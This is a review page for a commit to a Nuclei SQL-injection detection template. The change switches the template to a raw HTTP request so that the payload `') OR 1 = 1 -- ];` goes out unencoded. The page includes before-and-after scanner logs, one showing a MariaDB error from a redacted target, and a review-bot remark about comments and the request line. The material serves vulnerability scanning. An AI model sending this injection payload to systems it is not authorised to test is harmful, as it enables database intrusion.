Update error-based-sql-injection.yaml
Reverting back to raw http request. Sending encoded requests using net/http was missing blatant SQL injections.

Before:
[INF] Loading templates...
[INF] [error-based-sql-injection] Error based SQL injection (@geeknik) [high]
[INF] Loading workflows...
[INF] Using 1 rules (1 templates, 0 workflows)
[INF] No results found. Better luck next time!

After:
[INF] Loading templates...
[INF] [error-based-sql-injection] Error based SQL injection (@geeknik) [high]
[INF] Loading workflows...
[INF] Using 1 rules (1 templates, 0 workflows)
[2021-03-20 14:48:59] [error-based-sql-injection:MariaDB] [http] [high] https://REDACTED/') [check the manual that corresponds to your MariaDB server version]

patch-1
parent
ea0f3a2f48
commit
a3d7047521
|
@ -8,12 +8,13 @@ info:
|
||||||
tags: sqli
|
tags: sqli
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |+
|
||||||
- "{{BaseURL}}/') OR 1 = 1 -- ];"
|
GET /') OR 1 = 1 -- ];
|
||||||
|
Host: {{Hostname}}
|
||||||
# Nuclei's use of net/http here will automatically encode the payload, thus sending {{BaseURL}}/%27%29%20OR%201%20=%201%20--%20%5D; as the request
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
# In order to send an unencoded payload, you'll have to make use of the rawhttp library by crafting a raw HTTP request
|
Accept: */*
|
||||||
|
Connection: close
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
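Review bot: the two comment lines on the old side (the note that net/http automatically encodes the payload, and the note that an unencoded payload needs a raw request via rawhttp) are dropped, and nothing in the new `- raw:` block records why the request has to stay raw. Keep a one-line comment above `- raw:` so a later cleanup does not convert it back to `method`/`path` and bring back the encoded request that the commit message says missed findings. Separately, the request line as shown, `GET /') OR 1 = 1 -- ];`, has literal spaces in the target and no HTTP version after it; confirm the line in the template file ends with the version token, since a request line without one is handled inconsistently by servers and intermediaries and the check could then fail for reasons unrelated to the target.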